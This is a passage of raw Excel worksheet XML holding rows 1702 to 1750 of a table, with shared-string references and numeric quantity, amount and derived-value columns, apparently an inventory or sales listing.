        <v>2</v>
      </c>
      <c r="I1702" s="14">
        <v>1162.41</v>
      </c>
      <c r="J1702" s="15">
        <v>185.9872</v>
      </c>
      <c r="K1702" s="16"/>
    </row>
    <row r="1703" spans="2:11">
      <c r="B1703" s="9">
        <v>1737</v>
      </c>
      <c r="C1703" s="238" t="s">
        <v>9366</v>
      </c>
      <c r="D1703" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1703" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1703" s="9"/>
      <c r="G1703" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1703" s="10">
        <v>356</v>
      </c>
      <c r="I1703" s="14">
        <v>1355.62</v>
      </c>
      <c r="J1703" s="15">
        <v>217.0176</v>
      </c>
      <c r="K1703" s="16"/>
    </row>
    <row r="1704" spans="2:11">
      <c r="B1704" s="9">
        <v>1738</v>
      </c>
      <c r="C1704" s="238" t="s">
        <v>9367</v>
      </c>
      <c r="D1704" s="238" t="s">
        <v>9368</v>
      </c>
      <c r="E1704" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F1704" s="238" t="s">
        <v>8687</v>
      </c>
      <c r="G1704" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1704" s="10">
        <v>4</v>
      </c>
      <c r="I1704" s="14">
        <v>130</v>
      </c>
      <c r="J1704" s="15">
        <v>20.8</v>
      </c>
      <c r="K1704" s="16"/>
    </row>
    <row r="1705" spans="2:11">
      <c r="B1705" s="9">
        <v>1739</v>
      </c>
      <c r="C1705" s="238" t="s">
        <v>9369</v>
      </c>
      <c r="D1705" s="238" t="s">
        <v>9370</v>
      </c>
      <c r="E1705" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F1705" s="238" t="s">
        <v>9371</v>
      </c>
      <c r="G1705" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1705" s="10">
        <v>3</v>
      </c>
      <c r="I1705" s="14">
        <v>64.43</v>
      </c>
      <c r="J1705" s="15">
        <v>25.776</v>
      </c>
      <c r="K1705" s="16"/>
    </row>
    <row r="1706" spans="2:11">
      <c r="B1706" s="9">
        <v>1740</v>
      </c>
      <c r="C1706" s="238" t="s">
        <v>9372</v>
      </c>
      <c r="D1706" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E1706" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F1706" s="9"/>
      <c r="G1706" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1706" s="10">
        <v>36</v>
      </c>
      <c r="I1706" s="14">
        <v>666.27</v>
      </c>
      <c r="J1706" s="15">
        <v>266.544</v>
      </c>
      <c r="K1706" s="16"/>
    </row>
    <row r="1707" spans="2:11">
      <c r="B1707" s="9">
        <v>1741</v>
      </c>
      <c r="C1707" s="238" t="s">
        <v>9373</v>
      </c>
      <c r="D1707" s="238" t="s">
        <v>9374</v>
      </c>
      <c r="E1707" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F1707" s="238" t="s">
        <v>9375</v>
      </c>
      <c r="G1707" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1707" s="10">
        <v>1</v>
      </c>
      <c r="I1707" s="14">
        <v>44.8</v>
      </c>
      <c r="J1707" s="15">
        <v>7.168</v>
      </c>
      <c r="K1707" s="16"/>
    </row>
    <row r="1708" spans="2:11">
      <c r="B1708" s="9">
        <v>1742</v>
      </c>
      <c r="C1708" s="238" t="s">
        <v>9376</v>
      </c>
      <c r="D1708" s="238" t="s">
        <v>9377</v>
      </c>
      <c r="E1708" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F1708" s="238" t="s">
        <v>9378</v>
      </c>
      <c r="G1708" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1708" s="10">
        <v>4</v>
      </c>
      <c r="I1708" s="14">
        <v>160</v>
      </c>
      <c r="J1708" s="15">
        <v>25.6</v>
      </c>
      <c r="K1708" s="16"/>
    </row>
    <row r="1709" spans="2:11">
      <c r="B1709" s="9">
        <v>1743</v>
      </c>
      <c r="C1709" s="238" t="s">
        <v>9379</v>
      </c>
      <c r="D1709" s="238" t="s">
        <v>9380</v>
      </c>
      <c r="E1709" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F1709" s="238" t="s">
        <v>9381</v>
      </c>
      <c r="G1709" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1709" s="10">
        <v>4</v>
      </c>
      <c r="I1709" s="14">
        <v>156</v>
      </c>
      <c r="J1709" s="15">
        <v>24.96</v>
      </c>
      <c r="K1709" s="16"/>
    </row>
    <row r="1710" spans="2:11">
      <c r="B1710" s="9">
        <v>1744</v>
      </c>
      <c r="C1710" s="238" t="s">
        <v>9382</v>
      </c>
      <c r="D1710" s="238" t="s">
        <v>9383</v>
      </c>
      <c r="E1710" s="238" t="s">
        <v>9384</v>
      </c>
      <c r="F1710" s="238" t="s">
        <v>9385</v>
      </c>
      <c r="G1710" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1710" s="10">
        <v>8</v>
      </c>
      <c r="I1710" s="14">
        <v>26.96</v>
      </c>
      <c r="J1710" s="15">
        <v>4.3136</v>
      </c>
      <c r="K1710" s="16"/>
    </row>
    <row r="1711" spans="2:11">
      <c r="B1711" s="9">
        <v>1745</v>
      </c>
      <c r="C1711" s="238" t="s">
        <v>9386</v>
      </c>
      <c r="D1711" s="238" t="s">
        <v>9387</v>
      </c>
      <c r="E1711" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1711" s="238" t="s">
        <v>9388</v>
      </c>
      <c r="G1711" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1711" s="10">
        <v>1</v>
      </c>
      <c r="I1711" s="14">
        <v>1051.28</v>
      </c>
      <c r="J1711" s="15">
        <v>168.2048</v>
      </c>
      <c r="K1711" s="16"/>
    </row>
    <row r="1712" spans="2:11">
      <c r="B1712" s="9">
        <v>1746</v>
      </c>
      <c r="C1712" s="238" t="s">
        <v>9389</v>
      </c>
      <c r="D1712" s="238" t="s">
        <v>9390</v>
      </c>
      <c r="E1712" s="238" t="s">
        <v>4741</v>
      </c>
      <c r="F1712" s="238" t="s">
        <v>9391</v>
      </c>
      <c r="G1712" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1712" s="10">
        <v>1</v>
      </c>
      <c r="I1712" s="14">
        <v>3078.76</v>
      </c>
      <c r="J1712" s="15">
        <v>492.6016</v>
      </c>
      <c r="K1712" s="16"/>
    </row>
    <row r="1713" spans="2:11">
      <c r="B1713" s="9">
        <v>1747</v>
      </c>
      <c r="C1713" s="238" t="s">
        <v>9392</v>
      </c>
      <c r="D1713" s="238" t="s">
        <v>9393</v>
      </c>
      <c r="E1713" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1713" s="238" t="s">
        <v>9394</v>
      </c>
      <c r="G1713" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1713" s="10">
        <v>5</v>
      </c>
      <c r="I1713" s="14">
        <v>239.32</v>
      </c>
      <c r="J1713" s="15">
        <v>38.288</v>
      </c>
      <c r="K1713" s="16"/>
    </row>
    <row r="1714" spans="2:11">
      <c r="B1714" s="9">
        <v>1748</v>
      </c>
      <c r="C1714" s="238" t="s">
        <v>9395</v>
      </c>
      <c r="D1714" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1714" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1714" s="9"/>
      <c r="G1714" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1714" s="10">
        <v>13</v>
      </c>
      <c r="I1714" s="14">
        <v>17.2</v>
      </c>
      <c r="J1714" s="15">
        <v>2.7456</v>
      </c>
      <c r="K1714" s="16"/>
    </row>
    <row r="1715" spans="2:11">
      <c r="B1715" s="9">
        <v>1749</v>
      </c>
      <c r="C1715" s="238" t="s">
        <v>9396</v>
      </c>
      <c r="D1715" s="238" t="s">
        <v>8561</v>
      </c>
      <c r="E1715" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1715" s="9"/>
      <c r="G1715" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1715" s="10">
        <v>3</v>
      </c>
      <c r="I1715" s="14">
        <v>4102.56</v>
      </c>
      <c r="J1715" s="15">
        <v>656.4096</v>
      </c>
      <c r="K1715" s="16"/>
    </row>
    <row r="1716" spans="2:11">
      <c r="B1716" s="9">
        <v>1750</v>
      </c>
      <c r="C1716" s="238" t="s">
        <v>9397</v>
      </c>
      <c r="D1716" s="238" t="s">
        <v>6809</v>
      </c>
      <c r="E1716" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1716" s="9"/>
      <c r="G1716" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1716" s="9"/>
      <c r="I1716" s="17"/>
      <c r="J1716" s="15">
        <v>0</v>
      </c>
      <c r="K1716" s="16"/>
    </row>
    <row r="1717" spans="2:11">
      <c r="B1717" s="9">
        <v>1751</v>
      </c>
      <c r="C1717" s="238" t="s">
        <v>9398</v>
      </c>
      <c r="D1717" s="238" t="s">
        <v>9399</v>
      </c>
      <c r="E1717" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1717" s="238" t="s">
        <v>9400</v>
      </c>
      <c r="G1717" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1717" s="10">
        <v>1</v>
      </c>
      <c r="I1717" s="14">
        <v>135.67</v>
      </c>
      <c r="J1717" s="15">
        <v>21.7072</v>
      </c>
      <c r="K1717" s="16"/>
    </row>
    <row r="1718" spans="2:11">
      <c r="B1718" s="9">
        <v>1752</v>
      </c>
      <c r="C1718" s="238" t="s">
        <v>9401</v>
      </c>
      <c r="D1718" s="238" t="s">
        <v>9402</v>
      </c>
      <c r="E1718" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1718" s="238" t="s">
        <v>9400</v>
      </c>
      <c r="G1718" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1718" s="10">
        <v>1</v>
      </c>
      <c r="I1718" s="14">
        <v>108.12</v>
      </c>
      <c r="J1718" s="15">
        <v>17.2992</v>
      </c>
      <c r="K1718" s="16"/>
    </row>
    <row r="1719" spans="2:11">
      <c r="B1719" s="9">
        <v>1753</v>
      </c>
      <c r="C1719" s="238" t="s">
        <v>9403</v>
      </c>
      <c r="D1719" s="238" t="s">
        <v>9404</v>
      </c>
      <c r="E1719" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1719" s="238" t="s">
        <v>9405</v>
      </c>
      <c r="G1719" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1719" s="10">
        <v>3</v>
      </c>
      <c r="I1719" s="14">
        <v>676.92</v>
      </c>
      <c r="J1719" s="15">
        <v>108.3072</v>
      </c>
      <c r="K1719" s="16"/>
    </row>
    <row r="1720" spans="2:11">
      <c r="B1720" s="9">
        <v>1754</v>
      </c>
      <c r="C1720" s="238" t="s">
        <v>9406</v>
      </c>
      <c r="D1720" s="238" t="s">
        <v>9407</v>
      </c>
      <c r="E1720" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F1720" s="238" t="s">
        <v>9408</v>
      </c>
      <c r="G1720" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1720" s="10">
        <v>3</v>
      </c>
      <c r="I1720" s="14">
        <v>769.23</v>
      </c>
      <c r="J1720" s="15">
        <v>123.0768</v>
      </c>
      <c r="K1720" s="16"/>
    </row>
    <row r="1721" spans="2:11">
      <c r="B1721" s="9">
        <v>1755</v>
      </c>
      <c r="C1721" s="238" t="s">
        <v>9409</v>
      </c>
      <c r="D1721" s="238" t="s">
        <v>9410</v>
      </c>
      <c r="E1721" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F1721" s="238" t="s">
        <v>9411</v>
      </c>
      <c r="G1721" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1721" s="10">
        <v>3</v>
      </c>
      <c r="I1721" s="14">
        <v>179.49</v>
      </c>
      <c r="J1721" s="15">
        <v>28.7184</v>
      </c>
      <c r="K1721" s="16"/>
    </row>
    <row r="1722" spans="2:11">
      <c r="B1722" s="9">
        <v>1756</v>
      </c>
      <c r="C1722" s="238" t="s">
        <v>9412</v>
      </c>
      <c r="D1722" s="238" t="s">
        <v>9413</v>
      </c>
      <c r="E1722" s="238" t="s">
        <v>9205</v>
      </c>
      <c r="F1722" s="238" t="s">
        <v>9206</v>
      </c>
      <c r="G1722" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1722" s="10">
        <v>3</v>
      </c>
      <c r="I1722" s="14">
        <v>1299.14</v>
      </c>
      <c r="J1722" s="15">
        <v>207.864</v>
      </c>
      <c r="K1722" s="16"/>
    </row>
    <row r="1723" spans="2:11">
      <c r="B1723" s="9">
        <v>1757</v>
      </c>
      <c r="C1723" s="238" t="s">
        <v>9414</v>
      </c>
      <c r="D1723" s="238" t="s">
        <v>4757</v>
      </c>
      <c r="E1723" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F1723" s="238" t="s">
        <v>9415</v>
      </c>
      <c r="G1723" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H1723" s="10">
        <v>3</v>
      </c>
      <c r="I1723" s="14">
        <v>123.08</v>
      </c>
      <c r="J1723" s="15">
        <v>19.6944</v>
      </c>
      <c r="K1723" s="16"/>
    </row>
    <row r="1724" spans="2:11">
      <c r="B1724" s="9">
        <v>1758</v>
      </c>
      <c r="C1724" s="238" t="s">
        <v>9416</v>
      </c>
      <c r="D1724" s="238" t="s">
        <v>9417</v>
      </c>
      <c r="E1724" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F1724" s="238" t="s">
        <v>9418</v>
      </c>
      <c r="G1724" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1724" s="10">
        <v>4</v>
      </c>
      <c r="I1724" s="14">
        <v>854.72</v>
      </c>
      <c r="J1724" s="15">
        <v>136.7552</v>
      </c>
      <c r="K1724" s="16"/>
    </row>
    <row r="1725" spans="2:11">
      <c r="B1725" s="9">
        <v>1759</v>
      </c>
      <c r="C1725" s="238" t="s">
        <v>9419</v>
      </c>
      <c r="D1725" s="238" t="s">
        <v>9420</v>
      </c>
      <c r="E1725" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F1725" s="238" t="s">
        <v>9421</v>
      </c>
      <c r="G1725" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1725" s="10">
        <v>3</v>
      </c>
      <c r="I1725" s="14">
        <v>92.31</v>
      </c>
      <c r="J1725" s="15">
        <v>14.7696</v>
      </c>
      <c r="K1725" s="16"/>
    </row>
    <row r="1726" spans="2:11">
      <c r="B1726" s="9">
        <v>1760</v>
      </c>
      <c r="C1726" s="238" t="s">
        <v>9422</v>
      </c>
      <c r="D1726" s="238" t="s">
        <v>7325</v>
      </c>
      <c r="E1726" s="238" t="s">
        <v>7326</v>
      </c>
      <c r="F1726" s="238" t="s">
        <v>9423</v>
      </c>
      <c r="G1726" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1726" s="10">
        <v>2</v>
      </c>
      <c r="I1726" s="14">
        <v>1068.38</v>
      </c>
      <c r="J1726" s="15">
        <v>170.9408</v>
      </c>
      <c r="K1726" s="16"/>
    </row>
    <row r="1727" spans="2:11">
      <c r="B1727" s="9">
        <v>1761</v>
      </c>
      <c r="C1727" s="238" t="s">
        <v>9424</v>
      </c>
      <c r="D1727" s="9"/>
      <c r="E1727" s="238" t="s">
        <v>4854</v>
      </c>
      <c r="F1727" s="9"/>
      <c r="G1727" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1727" s="10">
        <v>1</v>
      </c>
      <c r="I1727" s="14">
        <v>1282.05</v>
      </c>
      <c r="J1727" s="15">
        <v>205.128</v>
      </c>
      <c r="K1727" s="16"/>
    </row>
    <row r="1728" spans="2:11">
      <c r="B1728" s="9">
        <v>1762</v>
      </c>
      <c r="C1728" s="238" t="s">
        <v>9425</v>
      </c>
      <c r="D1728" s="238" t="s">
        <v>9426</v>
      </c>
      <c r="E1728" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1728" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="G1728" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1728" s="10">
        <v>4</v>
      </c>
      <c r="I1728" s="14">
        <v>4448.65</v>
      </c>
      <c r="J1728" s="15">
        <v>711.7824</v>
      </c>
      <c r="K1728" s="16"/>
    </row>
    <row r="1729" spans="2:11">
      <c r="B1729" s="9">
        <v>1763</v>
      </c>
      <c r="C1729" s="238" t="s">
        <v>9427</v>
      </c>
      <c r="D1729" s="238" t="s">
        <v>9428</v>
      </c>
      <c r="E1729" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1729" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="G1729" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1729" s="10">
        <v>5</v>
      </c>
      <c r="I1729" s="14">
        <v>4515.85</v>
      </c>
      <c r="J1729" s="15">
        <v>722.536</v>
      </c>
      <c r="K1729" s="16"/>
    </row>
    <row r="1730" spans="2:11">
      <c r="B1730" s="9">
        <v>1764</v>
      </c>
      <c r="C1730" s="238" t="s">
        <v>9429</v>
      </c>
      <c r="D1730" s="238" t="s">
        <v>9430</v>
      </c>
      <c r="E1730" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1730" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="G1730" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1730" s="10">
        <v>3</v>
      </c>
      <c r="I1730" s="14">
        <v>612.1</v>
      </c>
      <c r="J1730" s="15">
        <v>97.9344</v>
      </c>
      <c r="K1730" s="16"/>
    </row>
    <row r="1731" spans="2:11">
      <c r="B1731" s="9">
        <v>1765</v>
      </c>
      <c r="C1731" s="238" t="s">
        <v>9431</v>
      </c>
      <c r="D1731" s="238" t="s">
        <v>9432</v>
      </c>
      <c r="E1731" s="238" t="s">
        <v>5005</v>
      </c>
      <c r="F1731" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="G1731" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1731" s="10">
        <v>3</v>
      </c>
      <c r="I1731" s="14">
        <v>413.33</v>
      </c>
      <c r="J1731" s="15">
        <v>66.1344</v>
      </c>
      <c r="K1731" s="16"/>
    </row>
    <row r="1732" spans="2:11">
      <c r="B1732" s="9">
        <v>1766</v>
      </c>
      <c r="C1732" s="238" t="s">
        <v>9433</v>
      </c>
      <c r="D1732" s="238" t="s">
        <v>9434</v>
      </c>
      <c r="E1732" s="238" t="s">
        <v>8897</v>
      </c>
      <c r="F1732" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="G1732" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1732" s="10">
        <v>3</v>
      </c>
      <c r="I1732" s="14">
        <v>110.39</v>
      </c>
      <c r="J1732" s="15">
        <v>44.16</v>
      </c>
      <c r="K1732" s="16"/>
    </row>
    <row r="1733" spans="2:11">
      <c r="B1733" s="9">
        <v>1767</v>
      </c>
      <c r="C1733" s="238" t="s">
        <v>9435</v>
      </c>
      <c r="D1733" s="238" t="s">
        <v>9436</v>
      </c>
      <c r="E1733" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F1733" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="G1733" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1733" s="10">
        <v>6</v>
      </c>
      <c r="I1733" s="14">
        <v>813.69</v>
      </c>
      <c r="J1733" s="15">
        <v>130.1952</v>
      </c>
      <c r="K1733" s="16"/>
    </row>
    <row r="1734" spans="2:11">
      <c r="B1734" s="9">
        <v>1768</v>
      </c>
      <c r="C1734" s="238" t="s">
        <v>9437</v>
      </c>
      <c r="D1734" s="238" t="s">
        <v>9438</v>
      </c>
      <c r="E1734" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1734" s="238" t="s">
        <v>3736</v>
      </c>
      <c r="G1734" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1734" s="10">
        <v>2</v>
      </c>
      <c r="I1734" s="14">
        <v>854.7</v>
      </c>
      <c r="J1734" s="15">
        <v>136.752</v>
      </c>
      <c r="K1734" s="16"/>
    </row>
    <row r="1735" spans="2:11">
      <c r="B1735" s="9">
        <v>1769</v>
      </c>
      <c r="C1735" s="238" t="s">
        <v>9439</v>
      </c>
      <c r="D1735" s="238" t="s">
        <v>9440</v>
      </c>
      <c r="E1735" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1735" s="238" t="s">
        <v>3736</v>
      </c>
      <c r="G1735" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1735" s="10">
        <v>1</v>
      </c>
      <c r="I1735" s="14">
        <v>299.15</v>
      </c>
      <c r="J1735" s="15">
        <v>47.864</v>
      </c>
      <c r="K1735" s="16"/>
    </row>
    <row r="1736" spans="2:11">
      <c r="B1736" s="9">
        <v>1770</v>
      </c>
      <c r="C1736" s="238" t="s">
        <v>9441</v>
      </c>
      <c r="D1736" s="238" t="s">
        <v>9442</v>
      </c>
      <c r="E1736" s="238" t="s">
        <v>9443</v>
      </c>
      <c r="F1736" s="238" t="s">
        <v>3736</v>
      </c>
      <c r="G1736" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1736" s="10">
        <v>1</v>
      </c>
      <c r="I1736" s="14">
        <v>760.68</v>
      </c>
      <c r="J1736" s="15">
        <v>121.7088</v>
      </c>
      <c r="K1736" s="16"/>
    </row>
    <row r="1737" spans="2:11">
      <c r="B1737" s="9">
        <v>1771</v>
      </c>
      <c r="C1737" s="238" t="s">
        <v>9444</v>
      </c>
      <c r="D1737" s="238" t="s">
        <v>9445</v>
      </c>
      <c r="E1737" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1737" s="238" t="s">
        <v>3736</v>
      </c>
      <c r="G1737" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1737" s="10">
        <v>1</v>
      </c>
      <c r="I1737" s="14">
        <v>406.17</v>
      </c>
      <c r="J1737" s="15">
        <v>64.9872</v>
      </c>
      <c r="K1737" s="16"/>
    </row>
    <row r="1738" spans="2:11">
      <c r="B1738" s="9">
        <v>1772</v>
      </c>
      <c r="C1738" s="238" t="s">
        <v>9446</v>
      </c>
      <c r="D1738" s="238" t="s">
        <v>9447</v>
      </c>
      <c r="E1738" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1738" s="238" t="s">
        <v>3736</v>
      </c>
      <c r="G1738" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1738" s="10">
        <v>3</v>
      </c>
      <c r="I1738" s="14">
        <v>4102.56</v>
      </c>
      <c r="J1738" s="15">
        <v>656.4096</v>
      </c>
      <c r="K1738" s="16"/>
    </row>
    <row r="1739" spans="2:11">
      <c r="B1739" s="9">
        <v>1773</v>
      </c>
      <c r="C1739" s="238" t="s">
        <v>9448</v>
      </c>
      <c r="D1739" s="238" t="s">
        <v>9449</v>
      </c>
      <c r="E1739" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1739" s="238" t="s">
        <v>3736</v>
      </c>
      <c r="G1739" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1739" s="10">
        <v>2</v>
      </c>
      <c r="I1739" s="14">
        <v>153.85</v>
      </c>
      <c r="J1739" s="15">
        <v>61.544</v>
      </c>
      <c r="K1739" s="16"/>
    </row>
    <row r="1740" spans="2:11">
      <c r="B1740" s="9">
        <v>1774</v>
      </c>
      <c r="C1740" s="238" t="s">
        <v>9450</v>
      </c>
      <c r="D1740" s="238" t="s">
        <v>9451</v>
      </c>
      <c r="E1740" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1740" s="238" t="s">
        <v>1170</v>
      </c>
      <c r="G1740" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1740" s="10">
        <v>3</v>
      </c>
      <c r="I1740" s="14">
        <v>1564.1</v>
      </c>
      <c r="J1740" s="15">
        <v>250.2576</v>
      </c>
      <c r="K1740" s="16"/>
    </row>
    <row r="1741" spans="2:11">
      <c r="B1741" s="9">
        <v>1775</v>
      </c>
      <c r="C1741" s="238" t="s">
        <v>9452</v>
      </c>
      <c r="D1741" s="238" t="s">
        <v>9453</v>
      </c>
      <c r="E1741" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1741" s="238" t="s">
        <v>1170</v>
      </c>
      <c r="G1741" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1741" s="10">
        <v>2</v>
      </c>
      <c r="I1741" s="14">
        <v>1230.77</v>
      </c>
      <c r="J1741" s="15">
        <v>196.9248</v>
      </c>
      <c r="K1741" s="16"/>
    </row>
    <row r="1742" spans="2:11">
      <c r="B1742" s="9">
        <v>1776</v>
      </c>
      <c r="C1742" s="238" t="s">
        <v>9454</v>
      </c>
      <c r="D1742" s="238" t="s">
        <v>9455</v>
      </c>
      <c r="E1742" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F1742" s="238" t="s">
        <v>1170</v>
      </c>
      <c r="G1742" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1742" s="10">
        <v>3</v>
      </c>
      <c r="I1742" s="14">
        <v>76.92</v>
      </c>
      <c r="J1742" s="15">
        <v>12.3072</v>
      </c>
      <c r="K1742" s="16"/>
    </row>
    <row r="1743" spans="2:11">
      <c r="B1743" s="9">
        <v>1777</v>
      </c>
      <c r="C1743" s="238" t="s">
        <v>9456</v>
      </c>
      <c r="D1743" s="238" t="s">
        <v>4947</v>
      </c>
      <c r="E1743" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F1743" s="9"/>
      <c r="G1743" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1743" s="10">
        <v>4</v>
      </c>
      <c r="I1743" s="14">
        <v>85.47</v>
      </c>
      <c r="J1743" s="15">
        <v>13.6768</v>
      </c>
      <c r="K1743" s="16"/>
    </row>
    <row r="1744" spans="2:11">
      <c r="B1744" s="9">
        <v>1778</v>
      </c>
      <c r="C1744" s="238" t="s">
        <v>9457</v>
      </c>
      <c r="D1744" s="238" t="s">
        <v>9458</v>
      </c>
      <c r="E1744" s="238" t="s">
        <v>9459</v>
      </c>
      <c r="F1744" s="9"/>
      <c r="G1744" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1744" s="10">
        <v>6</v>
      </c>
      <c r="I1744" s="14">
        <v>1794.87</v>
      </c>
      <c r="J1744" s="15">
        <v>287.184</v>
      </c>
      <c r="K1744" s="16"/>
    </row>
    <row r="1745" spans="2:11">
      <c r="B1745" s="9">
        <v>1779</v>
      </c>
      <c r="C1745" s="238" t="s">
        <v>9460</v>
      </c>
      <c r="D1745" s="238" t="s">
        <v>9461</v>
      </c>
      <c r="E1745" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F1745" s="238" t="s">
        <v>9462</v>
      </c>
      <c r="G1745" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1745" s="10">
        <v>8</v>
      </c>
      <c r="I1745" s="14">
        <v>123.08</v>
      </c>
      <c r="J1745" s="15">
        <v>19.6992</v>
      </c>
      <c r="K1745" s="16"/>
    </row>
    <row r="1746" spans="2:11">
      <c r="B1746" s="9">
        <v>1780</v>
      </c>
      <c r="C1746" s="238" t="s">
        <v>9463</v>
      </c>
      <c r="D1746" s="238" t="s">
        <v>9464</v>
      </c>
      <c r="E1746" s="238" t="s">
        <v>9465</v>
      </c>
      <c r="F1746" s="238" t="s">
        <v>9466</v>
      </c>
      <c r="G1746" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1746" s="10">
        <v>8</v>
      </c>
      <c r="I1746" s="14">
        <v>1299.15</v>
      </c>
      <c r="J1746" s="15">
        <v>207.8592</v>
      </c>
      <c r="K1746" s="16"/>
    </row>
    <row r="1747" spans="2:11">
      <c r="B1747" s="9">
        <v>1781</v>
      </c>
      <c r="C1747" s="238" t="s">
        <v>9467</v>
      </c>
      <c r="D1747" s="238" t="s">
        <v>9468</v>
      </c>
      <c r="E1747" s="238" t="s">
        <v>9469</v>
      </c>
      <c r="F1747" s="238" t="s">
        <v>9470</v>
      </c>
      <c r="G1747" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1747" s="10">
        <v>8</v>
      </c>
      <c r="I1747" s="14">
        <v>1025.64</v>
      </c>
      <c r="J1747" s="15">
        <v>164.1088</v>
      </c>
      <c r="K1747" s="16"/>
    </row>
    <row r="1748" spans="2:11">
      <c r="B1748" s="9">
        <v>1782</v>
      </c>
      <c r="C1748" s="238" t="s">
        <v>9471</v>
      </c>
      <c r="D1748" s="238" t="s">
        <v>9472</v>
      </c>
      <c r="E1748" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1748" s="238" t="s">
        <v>9473</v>
      </c>
      <c r="G1748" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1748" s="10">
        <v>30</v>
      </c>
      <c r="I1748" s="14">
        <v>64.3</v>
      </c>
      <c r="J1748" s="15">
        <v>10.272</v>
      </c>
      <c r="K1748" s="16"/>
    </row>
    <row r="1749" spans="2:11">
      <c r="B1749" s="9">
        <v>1783</v>
      </c>
      <c r="C1749" s="238" t="s">
        <v>9474</v>
      </c>
      <c r="D1749" s="238" t="s">
        <v>9475</v>
      </c>
      <c r="E1749" s="238" t="s">
        <v>9476</v>
      </c>
      <c r="F1749" s="238" t="s">
        <v>9477</v>
      </c>
      <c r="G1749" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1749" s="10">
        <v>4</v>
      </c>
      <c r="I1749" s="14">
        <v>2461.54</v>
      </c>
      <c r="J1749" s="15">
        <v>393.8496</v>
      </c>
      <c r="K1749" s="16"/>
    </row>
    <row r="1750" spans="2:11">
      <c r="B1750" s="9">
        <v>1784</v>
      </c>
      <c r="C1750" s="238" t="s">
        <v>9478</v>
      </c>
